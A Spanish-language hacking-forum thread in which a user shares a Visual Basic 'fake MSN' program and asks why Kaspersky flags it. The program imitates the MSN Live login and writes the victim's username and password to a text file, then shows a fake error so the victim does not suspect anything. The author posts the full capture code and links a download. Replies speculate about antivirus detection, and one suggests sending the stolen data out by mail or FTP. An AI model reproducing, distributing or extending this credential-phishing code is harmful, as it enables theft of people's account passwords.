KIS salta ante programa inofensivo en VB, ¿por qué?

Iniciado por invisible_hack, 21 Diciembre 2008, 03:36 AM

0 Miembros y 1 Visitante están viendo este tema.

invisible_hack

Hola chicos.

Bien, veréis, resulta que por fin he acabado de crear mi fake de msn (tenia ganas de hacerme uno, aunque evidentemente no lo voy a usar, pero por el simple hecho de programarlo) y pues ya lo he hecho, y lo he publicado en éste foro, en la sección de Software, les dejo el enlace por si le quieren echar un vistazo...

http://foro.elhacker.net/software/chorizator_20_by_invisiblehack-t239174.0.html;msg1144251#msg1144251

Bien, como véis, es un programa muy sencillo, lo único que hace es simular ser el Msn Live, con la misma interfaz y todo, y pues cuando el usuario mete su user y su clave y le da al botón de iniciar sesión, al usuario le salta un error, y su clave y usuario queda almacenada en un fichero de texto dentro del disco duro de la propia victima, no hace más que eso...

Pues bien, varios users han probado el programa, y varios de ellos que tenian en sus Pc`s instalados el KIS como antivirus, me dijeron que se lo detectaba como virus/gusano, y que se lo eliminaba al instante...

Yo tengo Panda 2009 (actualizado, claro) y no me ha saltado nada...

Entonces era por si me podríais decir el motivo de por qué salta el KIS ante mi programa, porque no me lo explico, ya digo que el programa no modificada nada, ni crea entradas en el registro, ni borra archivos....ni nada que se pueda considerar dañino o peligroso...

Un saludo, gracias  ;D
"Si no visitas mi blog, Chuck te dará una patada giratoria"

seba123neo

La característica extraordinaria de las leyes de la física es que se aplican en todos lados, sea que tú elijas o no creer en ellas. Lo bueno de las ciencias es que siempre tienen la verdad, quieras creerla o no.

Neil deGrasse Tyson

& eDu &

¿solo tiene de código el de almacenar los datos?

‭‭‭‭jackl007

problablemente el codigo que de alarma es cuando el programa se copia a system y se agrega al registro; en ese momento es un suceso clave para el kis/kav para pillar malware.
Si no seria que habrias copiado codigo de otra aplicacion ya detectada como gusano... entonces por eso lo detectaria a pesar de que hayas agregado mas cosas sin cambiar la parte donde anda la firma.

seba123neo

a ver...¿no era que no creaba entradas en el registro?, a mi me alto el antivirus y sin ver el source en estas cosas no le creo ni al mas amigo...algo tiene.. :¬¬ sino no salta por eso...
La característica extraordinaria de las leyes de la física es que se aplican en todos lados, sea que tú elijas o no creer en ellas. Lo bueno de las ciencias es que siempre tienen la verdad, quieras creerla o no.

Neil deGrasse Tyson

invisible_hack

Os aseguro que mi aplicación está totalmente limpia (los que me conoceis sabeis de sobra que llevo el suficiente tiempo metido aqui y en el mundo del hacking como para andar intentando colar troyanos en foros¬¬) y pues como ya dije, el único codigo que tiene la aplicación es en el botón de iniciar sesión, que es el que se encarga de capturar los datos que se meten en los textbox y crear el archivo en C:/

¿Puede ser que el KIS tenga una heuristica tan alta que detecte como acción peligrosa el hecho de que un programa cree por si mismo un archivo de texto?

"Si no visitas mi blog, Chuck te dará una patada giratoria"

jdc

Podrías poner el código? Es extraño por decirlo menos sí sólo hace lo que dices no habrá problema en poner el código

Littlehorse

Postea el source, si copiaste alguna parte del codigo es lo mas probable que sea detectada ya que esos fakes msn son mas viejos que el mundo.
An expert is a man who has made all the mistakes which can be made, in a very narrow field.

byway

que fake mas pobre... al menos ponle que se envie via mail o ftp... ;D ;D ;D

y aun asi no seria detectado por ningun av, pero de seguro ese tiene mas cosas que no mencionaste... y claro no pones el codigo, algo me dice que es u fake pero para los user que lo bajen  :laugh: :laugh: :laugh: :laugh:


invisible_hack

1º- Llevo el suficiente tiempo en el hacking y por este foro como para que todos sepais que yo ya estoy mayorcito para andar con pijadas de esas de subir troyanos y porquerias a los foros, yo no soy de esos, y los que me conoceis de hace tiempo lo sabéis bien...

2º- No tengo ningún problema en mostrar el código, aquí lo tenéis...

Citar
Private Sub Command1_Click()
Open "c:\recompensa.txt" For Append As #1
Print #1, Text1
Print #1, Text2
Close #1
MsgBox "Error conectando con el servicio", vbCritical, "Error de conexión"
End Sub


Eso va dentro del botón de Iniciar sesión (es decir, el unico boton que tiene el fake) y como véis, lo unico que hace es crear el archivo recompensa.txt en C;/ y abrirlo, y posteriormente meter dentro de ese archivo lo que la víctima haya escrito en los textbox 1 y 2 (user y pass respectivamente) y por último, para que la víctima no sospeche tanto, le salta un mensaje de error...

No tiene más código la aplicación...

"Si no visitas mi blog, Chuck te dará una patada giratoria"